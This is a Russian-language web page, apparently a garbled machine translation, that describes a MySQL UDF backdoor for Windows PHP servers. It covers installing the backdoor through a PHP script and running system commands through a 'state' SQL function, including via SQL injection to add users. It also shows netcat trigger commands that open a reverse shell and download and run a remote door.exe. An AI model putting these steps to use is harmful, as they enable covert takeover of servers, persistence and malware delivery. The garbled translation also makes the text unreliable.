Mysql BackDoor
Источник: Пури Манчестер
BackDoor MySQL был черный ход для развития PHP + MySQL сервер для MySQL после того, как задняя дверь установки дополнительных «государство» функции может выполнять системные команды, и начать с процесса Mysql основана Dll сниффер двери типа спины, ловко понял нет портов, нет процесса, нет услуги через троянских стен. программы в WINXP WIN2003 + MYSQL5.0.X, и при проходе.
Установка будет mysql.php распространиться на сервер PHP, согласно заполнить Host-User-Password-DB, нажмите на кнопку "автоматически установить BackDoor MySQL"
После успешной установки, Mysql будет увеличена на «государство» функции, в то время как процесс MySQL работает нюхать задней двери этого бэкдор в Windows имеет такие же привилегии системы и MySQL.
Использование функций государства
Государственная функция на самом деле система PHP () "Функция та же функция может быть использована для выполнения системных команд Пожалуйста, введите SQL команды:". Управления и заполнить заявление MySQL должен быть выполнен, например, "выберите состояние (" чистый nohack пользователей / add "), нажмите на кнопку" Выполнить SQL заявления будут работать результатов.
С государственной функции основаны нюхать заднюю дверь, даже если WebShell потерял, пока сервер, SQL инъекция точки, мы можем через инъекции. PHP? Id = 1 и государства ("чистый пользователь ')" метод выполняется на сервере .? команда Однако, если инъекции дело не в этом мы все еще называем нюхать назад серверный элемент управления дверью отправлять на любой порт сервера и открыты для Mysql-"начало пакета, смогут вызвать нюхать задней двери, например.:
Работающей системе команды: НК IP 80 -> Enter -> Mysql-CMD / с чистой пользователь ABC / add> C :/ log.txt (Примечание: "!" Последнего не может быть опущено)
2 20082 портов корпуса местных отказов сервера: первый запуск НК-20 082 р контролировать порт 20082 машины, а затем пс IP 80 -> Enter -> Mysql-C -> Enter
Пусть сервер загрузки: НК IP 80 -> Enter -> Mysql-HTTP :/ / www.x.com / door.exe-с mydoor.exe (Примечание: последнее "не может быть опущено)
В дополнение к отправке "MySQL-с-», другие команды не эхо, а соответствующие команды на сервере.
Удалить Mysql на ходу "государственной функции по капле" может быть выгружен, но в то же время вызовет процесс MySQL, чтобы выйти, вернуться в нормальное состояние после перезагрузки.










































158 Trackback (ы)
Вы должны быть зарегистрированы , чтобы оставить комментарий.